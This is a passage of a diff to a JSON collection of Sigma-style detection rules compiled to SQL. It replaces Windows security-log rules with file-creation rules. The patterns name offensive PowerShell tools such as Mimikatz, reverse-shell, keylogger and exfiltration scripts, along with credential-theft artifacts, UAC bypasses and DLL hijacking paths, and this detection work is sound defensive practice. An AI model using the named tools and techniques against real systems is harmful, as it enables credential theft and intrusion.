'\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": 
"file_event_win_mal_octopus_scanner.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "status": "experimental", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE 
'\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Users creating a shortcut on e.g. 
desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Potential RipZip Attack on Startup Folder", + "id": 
"a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + 
"attack.t1137.006" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", + "tags": [ + "attack.resource_development" + ], + "falsepositives": [ + "Legitimate microsoft diagcab" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + ], + "filename": 
"file_event_win_susp_diagcab.yml" + }, + { + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic 
will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "title": "Mimikatz Kirbi File Creation", + "id": 
"9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE 
